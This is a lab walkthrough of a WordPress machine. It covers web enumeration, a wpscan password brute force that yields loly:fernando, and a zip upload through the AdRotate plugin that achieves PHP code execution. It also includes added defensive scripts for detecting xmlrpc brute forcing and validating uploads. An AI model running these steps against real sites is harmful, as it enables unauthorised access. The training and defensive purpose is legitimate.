Web


Nmap discovered a web server on the target port 80. The running service is nginx 1.10.3 (Ubuntu).

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ curl -I -X OPTIONS http://$IP/              
HTTP/1.1 405 Not Allowed
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 27 Apr 2025 13:51:56 GMT
Content-Type: text/html
Content-Length: 182
Connection: keep-alive
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ curl -I http://$IP/        
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 27 Apr 2025 13:51:58 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Aug 2020 09:25:24 GMT
Connection: keep-alive
ETag: "5f3cf004-264"
Accept-Ranges: bytes

Webroot: it's the default Nginx installation page.

Fuzzing


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php -fc 403
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.120.121/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________
wordpress               [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 25ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1470 req/sec :: Duration: [0:00:56] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP/FUZZ/ -ic -fc 403
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.120.121/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________
                        [Status: 200, Size: 612, Words: 79, Lines: 26, Duration: 27ms]
wordpress               [Status: 200, Size: 28194, Words: 5011, Lines: 497, Duration: 494ms]
:: Progress: [207630/207630] :: Job [1/1] :: 1550 req/sec :: Duration: [0:02:17] :: Errors: 0 ::

/wordpress


The /wordpress endpoint indeed hosts a WordPress instance.

The CSS is not loaded because the page references it under a domain: loly.lc.

The domain has been added to the /etc/hosts file on Kali for local DNS resolution.

The CSS is now loaded.

wpscan


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ wpscan --url http://loly.lc/wordpress --random-user-agent -e u,ap,at --plugins-detection aggressive -t 128
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
 
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
 
[+] URL: http://loly.lc/wordpress/ [192.168.120.121]
[+] Started: Sun Apr 27 16:05:51 2025
 
Interesting Finding(s):
 
[+] Headers
 | Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 
[+] XML-RPC seems to be enabled: http://loly.lc/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
 
[+] WordPress readme found: http://loly.lc/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 
[+] The external WP-Cron seems to be enabled: http://loly.lc/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299
 
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
 | Found By: Rss Generator (Passive Detection)
 |  - http://loly.lc/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.5</generator>
 | Confirmed By: Emoji Settings (Passive Detection)
 |  - http://loly.lc/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
 
[+] WordPress theme in use: feminine-style
 | Location: http://loly.lc/wordpress/wp-content/themes/feminine-style/
 | Last Updated: 2025-04-21T00:00:00.000Z
 | Readme: http://loly.lc/wordpress/wp-content/themes/feminine-style/readme.txt
 | [!] The version is out of date, the latest version is 3.0.6
 | Style URL: http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css?ver=5.5
 | Style Name: Feminine Style
 | Style URI: https://www.acmethemes.com/themes/feminine-style
 | Description: Feminine Style is a voguish, dazzling and very appealing WordPress theme. The theme is completely wo...
 | Author: acmethemes
 | Author URI: https://www.acmethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css?ver=5.5, Match: 'Version: 1.0.0'
 
[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:01:20 <==================================================> (110222 / 110222) 100.00% Time: 00:01:20
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
 
[i] Plugin(s) Identified:
 
[+] adrotate
 | Location: http://loly.lc/wordpress/wp-content/plugins/adrotate/
 | Last Updated: 2025-03-18T21:03:00.000Z
 | Readme: http://loly.lc/wordpress/wp-content/plugins/adrotate/readme.txt
 | [!] The version is out of date, the latest version is 5.13.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/plugins/adrotate/, status: 200
 |
 | Version: 5.8.6.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/plugins/adrotate/readme.txt
 
[+] akismet
 | Location: http://loly.lc/wordpress/wp-content/plugins/akismet/
 | Last Updated: 2025-04-14T23:37:00.000Z
 | Readme: http://loly.lc/wordpress/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.1.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/plugins/akismet/readme.txt
 
[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:25 <====================================================> (29470 / 29470) 100.00% Time: 00:00:25
[+] Checking Theme Versions (via Passive and Aggressive Methods)
 
[i] Theme(s) Identified:
 
[+] feminine-style
 | Location: http://loly.lc/wordpress/wp-content/themes/feminine-style/
 | Last Updated: 2025-04-21T00:00:00.000Z
 | Readme: http://loly.lc/wordpress/wp-content/themes/feminine-style/readme.txt
 | [!] The version is out of date, the latest version is 3.0.6
 | Style URL: http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css
 | Style Name: Feminine Style
 | Style URI: https://www.acmethemes.com/themes/feminine-style
 | Description: Feminine Style is a voguish, dazzling and very appealing WordPress theme. The theme is completely wo...
 | Author: acmethemes
 | Author URI: https://www.acmethemes.com/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/feminine-style/, status: 500
 |
 | Version: 1.0.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css, Match: 'Version: 1.0.0'
 
[+] twentynineteen
 | Location: http://loly.lc/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://loly.lc/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://loly.lc/wordpress/wp-content/themes/twentynineteen/style.css
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/twentynineteen/, status: 500
 |
 | Version: 1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/twentynineteen/style.css, Match: 'Version: 1.7'
 
[+] twentyseventeen
 | Location: http://loly.lc/wordpress/wp-content/themes/twentyseventeen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://loly.lc/wordpress/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.9
 | Style URL: http://loly.lc/wordpress/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 2.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 2.4'
 
[+] twentytwenty
 | Location: http://loly.lc/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://loly.lc/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://loly.lc/wordpress/wp-content/themes/twentytwenty/style.css
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/twentytwenty/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/twentytwenty/style.css, Match: 'Version: 1.5'
 
[+] virtue
 | Location: http://loly.lc/wordpress/wp-content/themes/virtue/
 | Last Updated: 2025-04-03T00:00:00.000Z
 | Readme: http://loly.lc/wordpress/wp-content/themes/virtue/readme.txt
 | [!] The version is out of date, the latest version is 3.4.12
 | Style URL: http://loly.lc/wordpress/wp-content/themes/virtue/style.css
 | Style Name: Virtue
 | Style URI: https://kadencewp.com/product/virtue-free-theme/
 | Description: The Virtue theme is extremely versatile with tons of options, easy to customize and loaded with grea...
 | Author: Kadence WP
 | Author URI: https://kadencewp.com/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/virtue/, status: 200
 |
 | Version: 3.4.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/virtue/style.css, Match: 'Version: 3.4.2'
 
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <==========================================================> (10 / 10) 100.00% Time: 00:00:01
 
[i] User(s) Identified:
 
[+] loly
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
 
[+] A WordPress Commenter
 | Found By: Rss Generator (Passive Detection)
 
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
 
[+] Finished: Sun Apr 27 16:08:02 2025
[+] Requests Done: 139770
[+] Cached Requests: 26
[+] Data Sent: 38.065 MB
[+] Data Received: 23.085 MB
[+] Memory used: 445.141 MB
[+] Elapsed time: 00:02:10

A user was identified: loly.

Brute-Force Attack


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ wpscan --url http://loly.lc/wordpress --random-user-agent -U loly -P /usr/share/wordlists/rockyou.txt -t 128
 
[...REDACTED...]
 
[+] Performing password attack on Xmlrpc against 1 user/s                                                                      
[SUCCESS] - loly / fernando                                                                                                             
Trying loly / andres Time: 00:00:02 <                                                           > (256 / 14344648)  0.00%  ETA: ??:??:??
 
[!] Valid Combinations Found:
 | Username: loly, Password: fernando
 
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
 
[+] Finished: Sun Apr 27 16:20:39 2025
[+] Requests Done: 430
[+] Cached Requests: 5
[+] Data Sent: 204.062 KB
[+] Data Received: 532.291 KB
[+] Memory used: 285.855 MB
[+] Elapsed time: 00:00:15

The brute-force attack succeeded: loly:fernando.
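As an added defender-side example (not part of the original writeup), the following script flags the kind of xmlrpc.php password attack wpscan ran above by counting POSTs per source IP in a sliding window over nginx access-log lines. The log lines, IP addresses and threshold are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed nginx access-log lines in the default "combined" format that
# imitate an xmlrpc.php password attack; the IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [27/Apr/2025:16:20:25 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Apr/2025:16:20:25 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Apr/2025:16:20:26 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Apr/2025:16:20:27 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Apr/2025:16:20:28 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Apr/2025:16:20:29 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Apr/2025:16:20:30 +0000] "GET /wordpress/ HTTP/1.1" 200 28194 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Apr/2025:16:21:02 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 370 "-" "WordPress/5.5"
"""

# Fields of the combined log format that the detection needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def xmlrpc_bursts(log_text, window_seconds=60, threshold=5):
    """Return {ip: peak_count} for source IPs that POST to xmlrpc.php at
    least `threshold` times within any `window_seconds` sliding window."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].split("?")[0].endswith("/xmlrpc.php"):
            continue
        hits[m["ip"]].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))

    flagged = {}
    for ip, times in hits.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):  # slide the window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    print(xmlrpc_bursts(SAMPLE_LOG))
```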

wp-admin


Successfully authenticated.

Once admin access is granted to a WordPress instance, there are many ways to get code execution on the host system, such as installing a malicious plugin or editing a theme.

However, both installing a malicious plugin and editing themes appear to be disabled.

The AdRotate plugin really stands out. I’ll look more into this.

AdRotate


The version is 5.8.6.2.

It seems to support media handling. It might be possible to upload a file through this feature.

adrotate-media


As expected, the adrotate-media feature supports file upload. While there is an extension filter, it also accepts the .zip extension, and the archive is automatically extracted to the upload location. The upload location is presumably /banners.
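The weakness described above, as an added example that is not AdRotate's own code: a filter that checks only the uploaded file's own extension lets a .zip through, and the archive members are then written out unchecked. The hardened check opens the archive and validates every member name before anything is extracted. The allow-list and the test archives are constructed for the demo.

```python
import io
import posixpath
import zipfile

# Assumed allow-list of image extensions for a banner upload (not AdRotate's own).
ALLOWED_IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}


def outer_extension_check(filename, allowed=ALLOWED_IMAGE_EXTS):
    """Weak check: looks only at the uploaded file's own extension, so a
    .zip passes even though its members are never inspected."""
    ext = posixpath.splitext(filename)[1].lower()
    return ext in allowed | {".zip"}


def zip_members_are_safe(zip_bytes, allowed=ALLOWED_IMAGE_EXTS):
    """Hardened check: validate every member before extraction.
    Returns (ok, reason)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return False, "not a valid zip"
    for info in zf.infolist():
        name = info.filename
        if info.is_dir():
            continue
        # Reject absolute paths and any ".." segment (escape from /banners).
        if name.startswith("/") or ".." in name.split("/"):
            return False, f"path traversal: {name}"
        base = posixpath.basename(name)
        # Every extension in the name counts, so foo.php.png and .htaccess fail.
        exts = ["." + p.lower() for p in base.split(".")[1:]]
        if not exts or any(e not in allowed for e in exts):
            return False, f"disallowed member: {name}"
    return True, "ok"


def build_zip(members):
    """Constructed test archives: {member name: bytes} -> zip bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    evil = build_zip({"test.php": b"<?php phpinfo(); ?>"})
    print(outer_extension_check("test.zip"))   # weak filter accepts the archive
    print(zip_members_are_safe(evil))          # hardened check rejects its member
```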

Testing

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ cat test.php                  
<?php phpinfo(); ?>
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ zip test.zip test.php                 
  adding: test.php (stored 0%)

Creating a ZIP archive containing a PHP file.

Uploaded

While nothing shows up in the listing, that might be because only image files are detected. I would have to locate the /banners directory manually.

Located through the Settings tab

Uploaded file identified: /wp-content/banners/test.php. Code execution confirmed. Moving on to the Exploitation phase.

Vulnerabilities

Looking it up online reveals a vulnerability affecting AdRotate below 5.8.3: CVE-2022-0267.

Virtual Host / Sub-domain Discovery


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$IP/wordpress/ -H 'Host: FUZZ.loly.lc' -ic -mc all -fs 28194
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.120.121/wordpress/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.loly.lc
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response size: 28194
________________________________________________
www                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 53ms]
:: Progress: [114437/114437] :: Job [1/1] :: 84 req/sec :: Duration: [0:21:53] :: Errors: 0 ::

N/A